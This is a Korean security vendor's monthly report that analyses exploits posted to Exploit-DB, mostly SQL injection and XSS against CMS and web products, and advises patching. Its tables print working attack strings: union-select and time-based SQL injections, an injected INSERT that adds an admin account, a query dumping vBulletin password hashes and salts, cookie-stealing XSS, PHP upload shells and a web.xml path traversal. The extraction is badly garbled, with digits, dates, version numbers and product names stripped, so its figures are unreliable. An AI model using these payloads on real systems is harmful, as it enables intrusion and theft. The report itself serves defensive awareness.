EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 0 년 월에공개된 Exploit-DB 의분석결과, 잘알려진웹공격인 SQL Injection 과 XSS(Cross Site Scripting) 공격에대한보고가가장많았습니다. 분석된 SQL Injection 공격과 XSS 공격은비교적낮은공격난이도가요구되는쉽게시도가능한공격이었던반면, 높은위험도를지니고있어공격성공시치명적인피해를입을수있는것으로확인되었습니다. 이는단순한공격패턴에도쉽게웹서버의정보가유출되거나관리자권한이탈취되어웹사이트가악용될수있음을의미하기때문에, 보안담당자는 SQL Injection 과 XSS 에대한공격대응에조금더주의를기울이는것이필요합니다. 금월에는특히다양한종류의 (Content Management System) 에서 XSS, SQL Injection 등이보고되었습니다. 를비롯한해당보고서에포함되어있는 정보를확인하여문제가되는 를사용하고있고해당을보유하고있다고판단된다면신속하게보안패치를수행하여각에대응하는것을권고드립니다.. 별보고개수 보고개수 XSS 8 SQL Injection 8 File Upload LFI 총합계 9 0 0 0 0 0 별보고개수 9 8 8 XSS SQL Injection File Upload LFI 총합계. 위험도별분류 위험도 보고개수 백분율 상 8 6.% 중.8% 하 0 0.00% 합계 9 00.00% 위험도별분류 8 상 중. 공격난이도별현황공격난이도 보고개수 백분율 상.6% 중 0.77% 하 6 66.67% 총합계 9 00.00% 공격난이도별현황 상 중 6 하. 주요소프트웨어별발생현황소프트웨어이름 Analyzer WordPress Shopping Cart PHP Webquest NPDS Revolution- Microweber Mangallam e ServiceDesk Plus ecommercemajor Barracuda Networks Cloud 총합계 보고개수 9 주요소프트웨어별발생현황 Analyzer WordPress Shopping Cart PHP Webquest NPDS Revolution- Microweber Mangallam ** 개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 786 XSS 하 중.0. - credential 786 XSS 하 중.0. - inventories 786 XSS 하 중.0. - projects 786 XSS 하 중.0. - schedules 786 XSS 하 중.0. - permissions
EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 0-0-0 670 SQL Injection 중상 Absolut.7 - masection.php SQL Injection /admin/masection.php?&username=admin&session= c8d7ebc9b9ba7dbeb9bea6c7§ionid=%7 +and+=+union+select+,version%8%9,,,,6+--+.7 0-0-0 670 SQL Injection 중상 Absolut.7 - edituser.php SQL Injection /admin/edituser.php?username=admin&session=c8d7ebc9 b9ba7dbeb9bea6c7&userid=%7+and+=+ union+select+,user%8%9,,version%8%9,,datab ase%8%9,7,8,9+--+.7 0-0-0 670 SQL Injection 하상 Absolut.7 - admin.php SQL Injection /admin/admin.php?username=admin%7+and+substring %8user%8%9,,%9=%7root%7+-- +&session=c8d7ebc9b9ba7dbeb9bea6c7*.7 0-0-0 670 SQL Injection 중상 Absolut.7 - marelated.php SQL Injection /admin/marelated.php?username=user&session=ae 9000d8707c897e87d09b6&articleID=0&title={s ome_title}' and = union select,version(),,,,6,7,8,9,0,, --.7 0-0-0 69 XSS 하중.0 - add XSS POST /demo/games/add HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) ------------7dd009908f.0 ------WebKitFormBoundaryhqOjdXjGMh7GyfIw Content-Disposition: form-data; name="val[content]" <script>document.body.innerhtml="your text here"</script><noscript> ------WebKitFormBoundaryhqOjdXjGMh7GyfIw 0-0-06 70 XSS 하중 add XSS POST /adaptcms/admin/categories/add HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) ------------7dd009908f _method=post&data[_token][key]=8f8ee97800bb 06d7c69bcade60&data[Category][title]="><scr ipt>alert();</script>&data[_token][fields]=dece 076bf8f7e776fa7966:&data[_Token][unlocke d]= 0-0-06 70 XSS 하중 - ajax_fields XSS POST /adaptcms/admin/fields/ajax_fields/ HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) ------------7dd009908f data[field][category_id]=&data[field][title]="><script>aler t();</script>&data[field][description]= POST /adaptcms/admin/tools/create_theme?finish=true HTTP/. 0-0-06 70 XSS 하중 - create_theme XSS User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) Content-Type: application/x-www-form-urlencoded; {"basicinfo":{"name":"<script>alert();</script>"}} 0-0-06 70 XSS 하중 new XSS POST /adaptcms/forums/off-topic/new HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) ------------7dd009908f _method=post&data[_token][key]=c87b6 77ae8dbca8a7f9dba&data[ForumTopic][subject]=" ><script>alert();</script>&data[forumtopic][content]=<p >testingcontent</p>&data[forumtopic][topic_type]=topic &data[forumtopic][forum_id]=&data[_token][fields]=bcf f0f6eb0d877fcdd8c9f69a:forumtopic. forum_id ForumTopic.topic_type&data[_Token][unlocked] = 0-0-07 7 SQL Injection 중상 v..6.0 - main.php SQL Injection /backend/main.php?area=con_configcat&idcat=' and ''='' union select version(),user(),, -- &idtplconf=0 v..6.0
EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 0-0-07 7 SQL Injection 중상 v..6.0 - main.php SQL Injection /backend/main.php?area=plug&idclient=' and ''='' union select,version(),user(),,database(),6,7,8,9,0,,,, -- v..6.0 0-0-07 70 SQL Injection 하상 Microweber 0.9 - category: SQL Injection /shop/category: sleep(0) Microweber Microweber 0.9 0-0-08 70 File Upload 하중 WordPress Shopping Cart.0. - banneruploaderscript.php File Upload POST /wp-content/plugins/wpeasycart/inc/amfphp/administration/banneruploaderscript. php HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) ------------7dd009908f WordPress Shopping Cart WordPress Shopping Cart.0. -----------------------------7dd009908f Content-Disposition: form-data; name="filedata"; filename="shell.php" Content-Type: application/octet-stream <?php echo?> -----------------------------7dd009908f-- 0-0- 767 XSS 하중. - index.php XSS /admin/index.php?jak_username="><script>alert()</script >. 0-0- 767 XSS 하중. - dialog.php XSS /js/editor/plugins/filema/dialog.php?type="><script> alert()</script>. 0-0- 767 SQL Injection 하상. - index.php SQL Injection /admin/index.php?p=logs&sp=delete&ssp= and = --. 0-0- 786 XSS 하중.0. - credential /api/v/credentials?order_by="><script>alert('xss')</script>.0. 0-0- 786 XSS 하중.0. - inventories /api/v/inventories?order_by="><script>alert('xss')</script>.0. 0-0- 786 XSS 하중.0. - projects /api/v/projects?order_by="><script>alert('xss')</script>.0. 0-0- 786 XSS 하중.0. - schedules /api/v/schedules?next_run="><script>alert('xss')</script>.0. 0-0- 786 XSS 하중.0. - permissions /api/v/users//permissions?order_by="><script>alert('xss') </script>.0. 0-0- 87 SQL Injection 하상.0. - profile.functions.php SQL Injection POST /articlefr/register/ HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) ------------7dd009908f.0. username= and = &email=test@itas.vn&name=test&password=&su bmit=register 0-0- 890 SQL Injection 중상 e ServiceDesk Plus 9.0 - CreateReportTable.jsp SQL Injection /reports/createreporttable.jsp?site=0 AND UNION ALL SELECT user(),null,null,null,null e ServiceDesk Plus e ServiceDesk Plus 9.0
EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 0-0-6 9 SQL Injection 중상 POST /sis-ui/authenticate Host : Accept:*/* AppFire-Format-Version :.0 AppFire-Charset: UTF-6LE Content-Type : application/x-appfire User-Agent : Java/.7.0_ Data-Format=text/plain Data-Type=properties Data-Length=000 ai=&ha=example.com&nun=aaaaaaaaaaaaaa'; INSERT INTO USR (RID, USERNAME,PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (0, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP9JBtGy6ZvuZnkAZxXc=', '', '', '', '', '', '', '', '', NULL, 'SV DESCRIPTION', '0-09- 07::09', '0-09- 07::', '', '0', '0', 'NDSNcDdDb89eCIURLriEOL/RwZXlRuWxyQpyGR/tfWt 8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZKuq snkchwxx+agauawctdii7zxjoqafdaobasud867 mmeuxia0cezj0gcanwvnoerhqwttto='); -- ''..9 미만버전 0-0-6 9 XSS 하중 - SSO-Error.jsp XSS %Fwebui%FKhaki_docs%FSSO- Error.jsp%FErrorMsg%D%Cscript%Ealert(%7xss% 7)%C%Fscript%E%0A..9 미만버전 0-0-6 9 XSS 하중 - WCUnsupportedClass.jsp XSS %Fwebui%Fadmin%FWCUnsupportedClass.jsp%Fcl assname%d%cscript%ealert(%7xss%7)%c%f script%e..9 미만버전 0-0-6 9 SQL Injection 중상.0.-alpha - admin.php SQL Injection /admin.php?type=site&action=update&p=+and+=+uni on+select+,version%8%9,,+--+.0.-alpha 0-0-6 9 XSS 하중.0.-alpha - admin.php XSS /admin.php?type=search&action=%cscript%ealert%8 document.cookie%9%c/script%e.0.-alpha 0-0-6 9 SQL Injection 중상 - offerringads SQL Injection //classifieds/offerringads?controller=displayads&view=displayads&task=viewad& id=+and+=+union+select+,version%8%9,,+--+ 0-0-6 9 XSS 하중 - classifieds XSS //classifieds?view=displayads7edb"onl oad%d"alert()"87dd&layout=offerring&controller=disp layads&adtype= 0-0-6 90 LFI 하중 Analyzer 9.0 - index.do LFI /event/index.do?helpp=userreport&overview=true&tab= report&url=../../web-inf/web.xml%f Analyzer Analyzer 9.0 0-0-6 90 XSS 하중 Analyzer 9.0 - index.do LFI /event/index.do?helpp=userreport&overview=true&tab= report&url=userreport'%()%6%<ahy><script%0 >prompt(97)</script> Analyzer Analyzer 9.0 0-0-6 906 SQL Injection 하상 PHP Webquest.6 /phpwq/webquest/soporte_horizontal_w.php?id_actividad =8&id_pagina=%7%0and%0=-- PHP Webquest PHP Webquest.6 0-0-6 900 XSS 하중 0-0-6 899 SQL Injection 중상 Barracuda Networks Cloud Series - / XSS Mangallam - news_view.php SQL Injection 0-0- 878 SQL Injection 중상 ecommercemajor /<iframe src=a>%0%0%0%0\"><iframe src=http://vuln-lab.com onload=alert("vl") < /news_view.php?newsid=- +and+=+union+select+,version%8%9,,+--+ /ecommercemajor/product.php?productbycat=+and+= +union+select+,version%8%9,,+--+ Barracuda Networks Cloud Mangallam ecommercem ajor Barracuda Networks Cloud Series Mangallam ecommercem ajor 0-0- 88 File Upload 하중.0. - videouploader.php File Upload POST /articlefr/dashboard/videouploader.php HTTP/. User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows NT 6.; WOW6; Trident/6.0) ------------7dd009908f -----------------------------776700070 Content-Disposition: form-data; name="myvideo"; filename="img.php" Content-Type: image/gif.0. <?php phpinfo();?> -----------------------------776700070
EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB번호 분류 공격난이도 공격위험도 이름 핵심공격코드 대상프로그램 대상환경 POST /npds/search.php HTTP/. 0-0- 90 SQL Injection 중 상 NPDS Revolution- - NPDS NPDS search.php SQL Injection User-Agent: Mozilla/.0 (compatible; MSIE 0.0; Windows Revolution- Revolution- NT 6.; WOW6; Trident/6.0) Content-Type: application/x-www-form-urlencoded query=")and benchmark(0000000,sha())- /vbsso/vbsso.php?a=act&do=avatar&id=' or user.userid = UNION ALL SELECT userfield.*, usertextfield.*, user.*, usergroup.genericpermissions, UNIX_TIMESTAMP(passworddate) AS passworddate, IF(displaygroupid=0, user.usergroupid, displaygroupid) AS displaygroupid, concat(user.password, 0xa, user.salt) AS avatarpath, NOT ISNULL(customavatar.userid) AS hascustomavatar, customavatar.dateline AS avatardateline, 0-0-0 860 SQL Injection 상상.. - vbsso.php SQL Injection customavatar.width AS avwidth, customavatar.height AS avheight, customavatar.height_thumb AS avheight_thumb, customavatar.width_thumb AS avwidth_thumb, vbulletin vbsso Single Sign-On vbulletin vbsso Single Sign-On.. customavatar.filedata_thumb FROM user AS user LEFT JOIN userfield AS userfield ON (user.userid = userfield.userid) LEFT JOIN usergroup AS usergroup ON (usergroup.usergroupid = user.usergroupid) LEFT JOIN usertextfield AS usertextfield ON (usertextfield.userid = user.userid) LEFT JOIN avatar AS avatar ON (avatar.avatarid = user.avatarid) LEFT